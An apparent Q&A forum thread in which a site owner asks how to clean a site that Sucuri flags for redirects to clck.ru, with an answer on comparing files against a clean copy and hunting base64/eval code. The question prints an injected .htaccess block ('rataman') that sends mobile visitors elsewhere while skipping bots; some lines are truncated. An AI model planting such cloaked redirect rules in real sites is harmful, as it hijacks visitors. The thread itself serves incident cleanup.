I have a website, which apparently contains malware according to Sucuri SiteCheck. It refers some links to clck.ru.

Looking through the code does not mention clck.ru or similar.

I've run maldetect (on Ubuntu which is the OS) which found some files, which I've removed.

I've updated all applications and rebooted the system.

But Sucuri SiteCheck still does not validate the site to be clean.

The site I'm referring to is cphdans.dk. Can anyone help me out on what to do more?

Could it be some sort of SQL-injection hack so I should search the MySQL database for something (clck.ru is not found).

Update:

The .htaccess file was compromised with the following code:

#########rataman########## RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$ RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$ RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$ RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$ RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$ RewriteRule ^(.*)$ [L,R=302] #########!rataman!######### 
4

1 Answer

Sorry to heard about this. The code is probably obscured via base64 and eval. This stuff is nasty. What kind of system is it? Can you compare the codebase to a clean copy of the same software? Like you have the site on the server, but you have a clean backup in another directory like on a development or staging server? The reason being is that if you do, you can see what files might have changed.

Two ways I do is to use diff and rsync with CRC checks like so. First is a simple diff:

diff -Naur /path/to/infected/code/ /path/to/clean/code/ 

But I find using rsync in a dry run mode (option n) with the CRC option ofc` set works better:

rsync -rvnc /path/to/infected/code/ /path/to/clean/code/ 

Chances are you will find some or all of the following:

  1. Compromised Config File: Scripts will attempt to add malware to the beginning or end of PHP scripts.
  2. Files That Seem Like They Should Be There But Aren’t: For example, in WordPress there is a hello.php file. But some malware creates a hello1.php file or some similarly close, but not exact filename.
  3. Directories That Shouldn’t Exist: This is usually the real payload. The directory will contain tons of scripts.
  4. JavaScript: Check your JavaScript files for malware.

Again, you will most likely never find the cleartext versions of the URLs that are mentioned, but you will most likely find junk that should not be there that is just malware encoded/obscured via base64 and run via eval.

Also, check the user list in the admin for the site. Look for any newly registered or modified users.

EDIT According to the Google safe browsing check your site is clean. That said, looking at what Sucuri SiteCheck says shows a specific pages that are compromised. This one here. And this one here. Can you look at the code or any bits of the CMS content for those pages to see what is up?

enter image description here

2